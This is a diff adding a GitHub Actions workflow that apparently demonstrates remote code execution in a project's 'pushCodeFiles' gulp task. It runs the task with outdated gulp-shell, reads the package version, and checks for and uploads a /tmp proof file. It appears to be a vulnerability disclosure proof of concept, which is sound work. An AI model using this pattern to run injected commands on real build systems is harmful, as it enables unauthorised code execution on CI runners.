Add PoC workflow to demonstrate RCE in pushCodeFiles

Author: donutt2u

.github/workflows/poc-rce.yml

@@ -0,0 +1,40 @@
+name: PoC RCE Demonstration
+on:
+  pull_request:
+    branches: [ master ]
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+    - uses: actions/checkout@v4
+    - name: Set up Node.js
+      uses: actions/setup-node@v4
+      with:
+        node-version: '12'
+    - name: Install dependencies
+      run: npm install [email protected] [email protected] [email protected] babel-register
+    - name: Debug environment
+      run: |
+        echo "Node version:"
+        node --version
+        echo "NPM packages:"
+        npm list gulp gulp-shell gulp-zip babel-register
+        echo "Package version:"
+        node -p "require('./package.json').version"
+    - name: Run vulnerable Gulp task
+      run: |
+        echo "Running gulp pushCodeFiles with version: $(node -p "require('./package.json').version")"
+        npx gulp pushCodeFiles || echo "Gulp task failed (expected if gsutil missing); check for RCE output above"
+    - name: Check for proof file
+      run: |
+        if [ -f /tmp/rce_proof.txt ]; then
+          echo "Proof file found:"
+          cat /tmp/rce_proof.txt
+        else
+          echo "No proof file found (sandbox restriction)"
+        fi
+    - name: Upload proof artifact
+      uses: actions/upload-artifact@v4
+      with:
+        name: rce-proof
+        path: /tmp/rce_proof.txt